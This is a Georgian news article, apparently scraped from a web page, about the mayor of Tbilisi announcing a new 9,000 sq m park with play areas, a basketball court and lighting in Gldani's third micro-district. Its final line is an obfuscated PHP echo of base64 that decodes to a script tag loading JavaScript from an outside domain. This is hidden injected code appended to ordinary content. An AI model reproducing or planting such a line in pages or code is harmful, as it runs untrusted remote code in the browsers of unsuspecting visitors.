celsiusi
ავერსი საქკაბელი

გლდანის მესამე მიკრორაიონში, 9 000 კვ.მ ფართობზე პარკის მოწყობა მიმდინარეობს, – ამის შესახებ თბილისის მერმა, კახა კალაძემ დედაქალაქის მთავრობის სხდომაზე განაცხადა.

მისი თქმით, დედაქალაქში რეკრეაციული სივრცეების განვითარება მისთვის და მუნიციპალიტეტის მთავრობისთვის ერთ-ერთი მნიშვნელოვანი პრიორიტეტია.

1685531216 პარკი3

„გლდანის მესამე მიკრორაიონის N85-87-88 და მე-4 კორპუსების მიმდებარედ, დაახლოებით, 9 000 კვ.მ ფართობზე, რაიონის გამგეობა პარკს აწყობს. ეს სამუშაოები დაწყებულია. პროექტის ფარგლებში, ბავშვთა გასართობი ზონები, მოსასვენებლი პავილიონები, კალათბურთის მოედანი, ველობილიკისა და ფიტნესსივრცეები განთავსდება. ასევე, მოეწყობა გარე განათების სისტემა, განთავსდება სხვადასხვა სახის საპარკო ინფრასტრუქტურა და ტერიტორია სრულად გამწვანდება. დაახლოებით, 1 200 000 ლარი ჯდება აღნიშნული პროექტის განხორციელება. მიხარია, რომ ასეთი პროექტები ხორციელდება. ერთია, რომელსაც მუნიციპალიტეტის მერიის შესაბამისი სამსახურები ახორციელებენ სკვერებისა და პარკების მოწყობა-რეაბილიტაციის კუთხით, პარალელურად, გამგეობები თავიანთ რაიონებსა და უბნებში აწარმოებენ ამ ტიპის სამუშაოებს, რაც ძალიან კარგია“, – განაცხადა კახა კალაძემ.

1685531220 პარკი

დედაქალაქის მერის თქმით, მუნიციპალიტეტის მერია მსგავსი პროექტების განხორციელებას ყველანაირად შეუწყობს ხელს. 

1270
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");